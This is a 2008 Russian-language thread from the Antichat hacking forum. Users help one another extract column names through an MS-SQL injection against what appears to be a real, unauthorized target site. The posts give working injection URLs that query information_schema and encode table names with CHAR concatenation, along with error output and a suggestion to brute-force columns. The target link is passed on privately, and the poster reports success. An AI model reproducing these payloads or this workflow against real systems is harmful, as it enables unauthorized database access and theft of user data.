Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Получение колонок через MS-SQL injection. (https://forum.antichat.xyz/showthread.php?t=87666)

Dima-k17 06.10.2008 00:19
Получение колонок через MS-SQL injection.
 
Всем здрасте!=)
При банальном запросе вида:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+col umn_name+FROM+information_schema.columns+where+tab le_name='a_users')--
Получил ошибку, следующего содержания:
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14'

Joined tables cannot be specified in a query containing outer join operators. View or function 'information_schema.columns' contains joined tables.

/details.asp, line 59
Вопрос, реально ли в этой ситуации выдернуть имена столбцов, или придется перебирать? И если реально - то как это сделать?

~!DoK_tOR!~ 06.10.2008 00:44
Код:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--

Jokester 06.10.2008 01:09
Цитата:
Сообщение от ~!DoK_tOR!~
Код:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--
Вот так делать не надо, будет ошибка :
The char function requires 1 arguments.

Если уж char , то вот так : char(97)%2Bchar(95)%2Bchar(117)%2Bchar(115)%2Bchar (101)%2Bchar(114)%2Bchar(115)

Но ИМХО дело не в этом, ошибка какая-то не та. Если не то, давай линк, а то гадания опять на три страницы будут :)

l1ght 06.10.2008 01:17
колонки придется брутить, jokester inurl:details.asp?memberid=244247 только 1 линк)
Цитата:
Сообщение от ~!DoK_tOR!~
Код:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--
мда.......

Dima-k17 06.10.2008 01:53
jokester, l1ght - линк в ПМ.
А доктору и гисти по минусу бы поставить:-D

Dima-k17 06.10.2008 05:58
Проблема решилась много проще=) все 97 столбцов оказались числовыми....


Время: 20:01